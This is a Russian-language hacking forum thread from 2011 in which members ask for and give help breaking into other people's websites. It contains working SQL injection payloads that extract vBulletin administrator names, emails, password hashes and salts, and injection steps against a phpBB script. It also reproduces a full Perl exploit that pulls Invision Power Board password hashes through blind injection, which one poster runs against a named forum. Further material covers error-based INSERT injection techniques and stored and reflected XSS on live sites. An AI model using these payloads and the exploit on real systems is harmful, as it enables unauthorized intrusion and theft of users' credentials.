Ваши вопросы по уязвимостям.

Cherep · 11 Aug 2011

Есть уязвимый форум на vBulletin . При просмотре администраторов через:
Code:
форум/showgroups.php
в группе Администраторы 3 человека.
Но когда в Live HTTP дописываю:
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6#
то мне выдает всего 1 админа.
Как сделать чтобы все админы выводились? Или эти 2 остальных админа прописаны тупо для вида?

HAXTA4OK · 11 Aug 2011

Cherep said:
Есть уязвимый форум на vBulletin . При просмотре администраторов через:
Code:
форум/showgroups.php
в группе Администраторы 3 человека.
Но когда в Live HTTP дописываю:
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6#
то мне выдает всего 1 админа.
Как сделать чтобы все админы выводились? Или эти 2 остальных админа прописаны тупо для вида?
Click to expand...
а если попробовать LIMIT ?
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6 limit 0,1#
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6 limit 1,1#
Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE usergroupid=6 limit 2,1#

Expl0ited · 11 Aug 2011

ne0k said:

Наткнулся на код, в котором значение из $_GET напрямую передается в класс PhpThumbFactory::create.. В этом классе происходит проверка на валидность входного IMG файла.. Т.е, если я подставляю:
?filename=/../../1.jpg , отображается соответственно сама картинка, находящаяся в корне.. При попытке прочитать реальную JPG, GIF, PNG, читается из любого места.. А вот прочитать файл другого формата не удается, все это проверяется, и мозгов у меня пока не хватает, чтобы сделать какие либо выводы..

PHP:

<?php //reference thumbnail class require_once('includes/thumbs/ThumbLib.inc.php'); if (!isset($_GET['filename'])) { exit; } if (isset($_GET['width']) && is_numeric($_GET['width'])) { $width = $_GET['width']; } else { $width = 0; } if (isset($_GET['height']) && is_numeric($_GET['height'])) { $height = $_GET['height']; } else { $height = 0; } $thumb = PhpThumbFactory::create($_GET['filename'], array(), false, 1); $thumb->resize($width,$height); $thumb->show(); $thumb->destruct(); ?>

Существуют ли методы обхода, или как можно заставить PHP код выполниться в реальном IMG файле? И вообще, уязвимость ли это, или просто фича?

php 5.3.6

З.ы.:magic_quotes_gpc=Off,
З.ы.ы.: Проверка идет по mime типу и еще по нескольким параметрам..
Click to expand...

Я так понимаю там стоит фреймворк PhpThumb, попробуй поискать сплоиты именно под него, например:
http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit/

justonline · 11 Aug 2011

на сайте есть пассивная xss в урле...но там идет только замена спец символов на их коды. больше никаких фильтров нет(100%) можно использовать как нибудь?

justonline · 11 Aug 2011

я реализовал xss, радовался жизнИ, потом админ поставил замену спец символов на html код.

ne0k · 11 Aug 2011

Я так понимаю там стоит фреймворк PhpThumb, попробуй поискать сплоиты именно под него, например:
http://snipper.ru/view/8/phpthumb-179-arbitrary-command-execution-exploit/
Click to expand...

Интересно.. Поиграюсь вечером..

Есть еще вопрос. Возможно ли провести sql inj при INSERT в БД данных из массива? При этом, данные, в массиве из $_POST, и ни коем образом не фильтруются...
Вот так:

PHP:

$wpdb->insert(TABLE, array('type' => $type, 'settings' => serialize($settings), 'created' => date("Y-m-d"), 'title' => $_POST['title'], 'description'=>$_POST['description']));

Смог реализовать активную XSS.. Данные инсертятся в БД без какой либо фильтрации, соответственно потом, при выборке title и или description, срабатывает XSS на странице..

Но нужен скуль..

Может что еще можно сделать тут? Думаю, как бы реализовать выполнение кода, но к сожалению, страница, которая отображает содержимое этих двух ячеек, никак не воспринимается интэрпритатором php, т.е. если отправить постом '<?php phpinfo(); ?>' а потом вывести на страницу, то будет просто навсего пустой тайтл или дискрипшн.. А в сорцах страницы отображается как есть: <?php phpinfo(); ?>....

Пока не знаю куда рыть дальше..
----------------------------------------------

Переменная $type получает свое значение из $_GET[type], но фильтруется :

PHP:

if(!empty=$_GET['type']) && is_numeric($_GET['type']) { $type=$_GET[type]; }

и тут никак не пробиться, поэтому остается надеяться на $_POST[title] и $_POST[description] ...

Tiku$ · 11 Aug 2011

извиняюсь если ошибся темой. колупал сегодня один форум.
методом подбора нашел в корневой файл tester.php
вот отрывок из него:

Fix bug_user privmsgs

2->11 total unreadprvmsgs- 18513->0 total unreadprvmsgs- 3->1 total unreadprvmsgs- 4->0 total unreadprvmsgs- 5->0 total unreadprvmsgs- 6->0 total unreadprvmsgs- 7->0 total unreadprvmsgs- 8->0 total unreadprvmsgs- 9->0 total unreadprvmsgs- 10->0 total unreadprvmsgs- 11->0 total unreadprvmsgs- 13->1 total unreadprvmsgs- 14->0 total unreadprvmsgs- 17->0 total unreadprvmsgs- 18->0 total unreadprvmsgs- 19->0 total
и дальше бла бла бла...
Click to expand...

при запросе: tester.php?=start=2000'
выдает следующее

phpBB : Критическая ошибка Error doing DB query userdata row fetch DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 1' at line 4 SELECT user_id, username, user_unread_privmsg FROM users WHERE user_active = 1 LIMIT 2000', 1 Line : 26 File : test.php
Click to expand...

вопрос можно ли дальше что-то сделать?

Expl0ited · 11 Aug 2011

Tiku$ said:

извиняюсь если ошибся темой. колупал сегодня один форум.
методом подбора нашел в корневой файл tester.php
вот отрывок из него:

при запросе: tester.php?=start=2000'
выдает следующее

вопрос можно ли дальше что-то сделать?
Click to expand...

tester.php?start=2,22222222+union+select+1,2,3--+

Tiku$ · 11 Aug 2011

Expl0ited,

504 Gateway Time-out
nginx/0.7.67
Click to expand...

Moriarty, не подскажешь может статья какая-то есть? а то я первый раз))

Expl0ited · 11 Aug 2011

Tiku$ said:

Expl0ited,

Moriarty, не подскажешь может статья какая-то есть? а то я первый раз))
Click to expand...

http://forum.antichat.ru/thread43966.html

Expl0ited · 11 Aug 2011

Moriarty said:

Статья хз...всё практика)
Вообщем инъекция в LIMIT есть тогда, когда нету ORDER BY.

А ошибка пропадет, когда количество колонок правильное подберешь (в данном случае таблицы users)...
Короче не ленись: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Click to expand...

Если бы твой опыт подсказал обратить внимание на запрос к бд который вываливается в ошибке:
Code:
SELECT user_id, username, user_unread_privmsg FROM users WHERE user_active = 1 LIMIT 2000', 1
то ты сразу бы заметил, что в данном случае всего три колонки участвующий в запросе user_id, username, user_unread_privmsg, соответственно иъекция должна быть вида:
union select 1,2,3#

WTSBugzoff · 11 Aug 2011

почему при использовании эксплойта в перл, при выводе
MySQL version:
Data dir:
User:
Database:
id:
group:

Все строки пустые?

Gorev · 11 Aug 2011

потому что гладиолус....какой експлоит ?..кaк вбивал данные..и тд и тп..?

WTSBugzoff · 11 Aug 2011

Code:

#!/usr/bin/perl 

## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX 
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4) 
## tested on version 1 Final and version 3.1.4 
## * work on all mysql versions 
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On) 
## (c)oded by 1dt.w0lf 
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~ 
## screen: 
## ~~~~~~~ 
## r57ipb3.pl blah.com /ipb13/ 1 0 
## [~] SERVER : blah.com 
## [~] PATH : /ipb13/ 
## [~] MEMBER ID : 1 
## [~] TARGET : 0 - IPB 1.* 
## [~] SEARCHING PASSWORD ... [ DONE ] 
## 
## MEMBER ID : 1 
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99 
## 
## r57ipb3.pl blah.com /ipb314/ 1 1 
## [~] SERVER : blah.com 
## [~] PATH : /ipb314/ 
## [~] MEMBER ID : 1 
## [~] TARGET : 1 - IPB 2.* 
## [~] SEARCHING PASSWORD ... [ DONE ] 
## 
## MEMBER ID : 1 
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d 
## 
## r57ipb3.pl blah.com /ipb314/ 1 1 
## [~] SERVER : blah.com 
## [~] PATH : /ipb314/ 
## [~] MEMBER ID : 1 
## [~] TARGET : 1 - IPB 3.* 
## [~] SEARCHING PASSWORD ... [ DONE ] 
## 
## MEMBER ID : 1 
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d 
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~ 
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC 
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~ 
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com 
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~ 

use IO::Socket; 

if (@ARGV < 4) { &usage; } 

$server = $ARGV[0]; 
$path = $ARGV[1]; 
$member_id = $ARGV[2]; 
$target = $ARGV[3]; 

$pass = ($target)?('member_login_key'):('password'); 

$server =~ s!(http://)!!; 

$request = 'http://'; 
$request .= $server; 
$request .= $path; 

$s_num = 1; 
$|++; 
$n = 0; 

print "[~] SERVER : $server\r\n"; 
print "[~] PATH : $path\r\n"; 
print "[~] MEMBER ID : $member_id\r\n"; 
print "[~] TARGET : $target"; 
print (($target)?(' - IPB 3.*'):(' - IPB 2.*'):(' - IPB 1.*')); 
print "\r\n"; 
print "[~] SEARCHING PASSWORD ... [|]"; 

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; 

while(1) 
{ 
if(&found(47,58)==0) { &found(96,122); } 
$char = $i; 
if ($char=="0") 
{ 
if(length($allchar) > 0){ 
print qq{bb DONE ] 

MEMBER ID : $member_id 
}; 
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : ')); 
print $allchar."\r\n"; 
} 
else 
{ 
print "\b\b FAILED ]"; 
} 
exit(); 
} 
else 
{ 
$allchar .= chr(42); 
} 
$s_num++; 
} 

sub found($$) 
{ 
my $fmin = $_[0]; 
my $fmax = $_[1]; 
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } 

$r = int($fmax - ($fmax-$fmin)/2); 
$check = " BETWEEN $r AND $fmax"; 
if ( &check($check) ) { &found($r,$fmax); } 
else { &found($fmin,$r); } 
} 

sub crack($$) 
{ 
my $cmin = $_[0]; 
my $cmax = $_[1]; 
$i = $cmin; 
while ($i<$cmax) 
{ 
$crcheck = "=$i"; 
if ( &check($crcheck) ) { return $i; } 
$i++; 
} 
$i = 0; 
return $i; 
} 

sub check($) 
{ 
$n++; 
status(); 
$ccheck = $_[0]; 
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D"; 
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7  2%69%6E%67%28"; 
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*"; 
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; 
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%2  1%20"; 
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); 

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", 
$path,$server,$cmember_id,$pass_hash1,$cmember_id,  $pass_hash2,$pass_hash3,$nmalykh); 

while(<$socket>) 
{ 
if (/Set-Cookie: session_id=0;/) { return 1; } 
} 

return 0; 
} 

sub status() 
{ 
$status = $n % 5; 
if($status==0){ print "\b\b/]"; } 
if($status==1){ print "\b\b-]"; } 
if($status==2){ print "\b\b\\]"; } 
if($status==3){ print "\b\b|]"; } 
} 

sub usage() 
{ 
print q( 
Invision Power Board v < 3.1.4 SQL injection exploit 
---------------------------------------------------- 
USAGE: 
~~~~~~ 
r57ipb3.pl [server] [/folder/] [member_id] [target] 

[server] - host where IPB installed 
[/folder/] - folder where IPB installed 
[member_id] - user id for brute 

targets: 
0 - IPB 1.* 
1 - IPB 2.* 
2 - IPB 3.* (Prior To 3.1.4) 

e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1 
---------------------------------------------------- 
(c)oded by 1dt.w0lf 
RST/GHC , http://rst.void.ru , http://ghc.ru 
); 
exit(); 
}

c:\perl\bin\perl c:\perl\bin\ex.pl forum.ru/forum/ipb314/ 1 1

так вот

Expl0ited · 11 Aug 2011

ne0k said:

Интересно.. Поиграюсь вечером..

Есть еще вопрос. Возможно ли провести sql inj при INSERT в БД данных из массива? При этом, данные, в массиве из $_POST, и ни коем образом не фильтруются...
Вот так:

PHP:

$wpdb->insert(TABLE, array('type' => $type, 'settings' => serialize($settings), 'created' => date("Y-m-d"), 'title' => $_POST['title'], 'description'=>$_POST['description']));

Смог реализовать активную XSS.. Данные инсертятся в БД без какой либо фильтрации, соответственно потом, при выборке title и или description, срабатывает XSS на странице..
Click to expand...

Возможно провести инъекцию если есть вывод ошибки. Процитирую сообщение s4avrd0w:

SQLi в Insert/Update/Delete/etc

Все знают, что склеивание строк в MySQL происходит с использованием функций concat() и concat_ws(), а также с использованием комментариев /**/ и /*!12345*/, или, с использованием "размешивания" кавычек "1"'2'"3" и '1'"2"'3'.

Но не все знают, что MySQL поддерживает все следующие операнды для работы со строками:
+, -, =, &, |, &&, ||, <=>, <=, >=, !=, <>, ^, *, <<, >>, <>, %, /, <, >, or not, and not, div, xor, or, and

помимо привычных like, sounds like, regexp, rlike, not like, not regexp и т.д.

Так, запросы вида:
select * from users where name = 'te'+'st';
select * from users where name = 'te'='st';

вернут все содержимое таблицы users т.к. (select 'te'+'st') и (select 'te'='st') = 0

А запросы вида (select 'te'%'st') и (select 'te'/'st') = NULL и потому, в приведенной выше конструкции, аналогичным образом указанные запросы вернут содержимое всей таблицы.

Стоит сказать, что символы + и - можно "плодить" до бесконечности. И только, когда будет достигнут лимит строки (у меня это 1048577) результатом станет NULL.

К слову, для конструкций вида:
!=!, !=!!, !=!!! … !=!!!!! или !=!<!<!<! или !=!>!>! или !=!<!>! или !=!~!~! или !=!+! или !=!-!
это утверждение также справедливо.

Все приведенное выше находит свое применение, когда SQLi попадает в строковый параметр. И если в selection-based инъекциях можно на это особо не заморачиваться, то при эксплуатации инъекций в insert/update/delete/etc с этим приходится сталкиваться. Примеры:

/*(1)*/ insert into users (id,name) values (1,'sqli');

mysql> insert into users (id,name) values (1,''&(select 1 from(select count(*),concat((select user()from information_schema.tables limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a));
ERROR 1062 (23000): Duplicate entry 'root@localhost:1' for key 'group_key'

в http/get:

/index.php?s='%2b(select+1+from(select+count(*),concat((select+user ()+from+information_schema.tables+limit+0,1),0x3a, floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)%2b'

/index.php?s='%26(select+1+from(select+count(*),concat((select+user ()+from+information_schema.tables+limit+0,1),0x3a, floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)%26'

/*(2)*/ insert into users set name='sqli';

mysql> insert into users set name=''div(select 1 from(select count(*),concat((select user()from information_schema.tables limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)!=!!!'';
ERROR 1062 (23000): Duplicate entry 'root@localhost:1' for key 'group_key'

mysql> insert into users set name=''and(select 1 from(select count(*),concat((select user()from information_schema.tables limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)or'';
ERROR 1062 (23000): Duplicate entry 'root@localhost:1' for key 'group_key'

Для Update/Delete запросы аналогичным образом будут работать.
Click to expand...

WTSBugzoff · 12 Aug 2011

Вопрос, если пишет при поиске пароля через перл - FAILED , то значит что фикс?
И еще вопрос, что в перле означает target?

Gorev · 12 Aug 2011

WTSBugzoff said:

Вопрос, если пишет при поиске пароля через перл - FAILED , то значит что фикс?
И еще вопрос, что в перле означает target?
Click to expand...

да...цель

Tiku$ · 12 Aug 2011

делаю start=99999999+union+select+1,2,3--+
и сервер не отвечает, на большинство остальных заросов типа start=99999999+union+select+1,2,3,4,5--+ он нормально реагирует и выдает ошибку
почему так?

Expl0ited · 12 Aug 2011

Tiku$ said:

делаю start=99999999+union+select+1,2,3--+
и сервер не отвечает, на большинство остальных заросов типа start=99999999+union+select+1,2,3,4,5--+ он нормально реагирует и выдает ошибку
почему так?
Click to expand...

скорее всего получившиеся данные обрабатывается еще каким-то способом, что ведет к глобальному фейлу скрипта, попробуй сделать так:
start=99999999+union+select+1111,null,null--+
start=99999999+union+select+null,2222,null--+
start=99999999+union+select+null,null,3333--+

stasiliy · 12 Aug 2011

Подскажите плз, ISP manager Пароли к админке держит в БАЗЕ?
спасибо

Ваши вопросы по уязвимостям.

Cherep New Member

HAXTA4OK Super Moderator
Staff Member

Expl0ited Members of Antichat

justonline network ninja

justonline network ninja

ne0k New Member

Tiku$ Member

Expl0ited Members of Antichat

Tiku$ Member

Expl0ited Members of Antichat

Expl0ited Members of Antichat

WTSBugzoff New Member

Gorev Level 8

WTSBugzoff New Member

Expl0ited Members of Antichat

WTSBugzoff New Member

Gorev Level 8

Tiku$ Member

Expl0ited Members of Antichat

stasiliy New Member

Useful Searches

Ваши вопросы по уязвимостям.

Cherep New Member

HAXTA4OK Super Moderator Staff Member

Expl0ited Members of Antichat

justonline network ninja

justonline network ninja

ne0k New Member

Tiku$ Member

Expl0ited Members of Antichat

Tiku$ Member

Expl0ited Members of Antichat

Expl0ited Members of Antichat

WTSBugzoff New Member

Gorev Level 8

WTSBugzoff New Member

Expl0ited Members of Antichat

WTSBugzoff New Member

Gorev Level 8

Tiku$ Member

Expl0ited Members of Antichat

stasiliy New Member

HAXTA4OK Super Moderator
Staff Member